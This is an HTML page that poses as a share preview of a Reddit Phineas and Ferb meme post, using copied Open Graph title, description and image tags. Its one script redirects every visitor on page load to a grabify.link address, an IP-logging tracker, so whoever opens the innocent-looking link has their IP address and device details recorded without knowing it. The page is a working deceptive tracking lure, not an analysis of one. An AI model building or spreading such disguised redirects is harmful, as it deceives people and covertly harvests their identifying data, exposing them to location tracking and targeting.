<!-- FB OG -->
<html prefix="og: http://ogp.me/ns#">
<title>NTVP</title>
<meta property="og:url"                content="https://www.reddit.com/r/phineasandferb/comments/jw6u5m/this_is_how_doofenshmirtzs_phone_looks_like_when/" />
<meta property="og:type"               content="article" />
<meta property="og:title"              content="This is how Doofenshmirtz‘s phone looks like when he press self-destruct button instead of power button." />
<meta property="og:description"        content="This is how Doofenshmirtz‘s phone looks like when he press self-destruct button instead of power button." />
<meta property="og:image"              content="https://preview.redd.it/3nqevab8owz51.jpg?width=433&auto=webp&s=9c2cab74988217340e8ecc926dc07cd5d8ca4b02" />
<meta property="fb:app_id"             content="444221076359093" />
<script>document.location='https://grabify.link/60L7AF';</script>
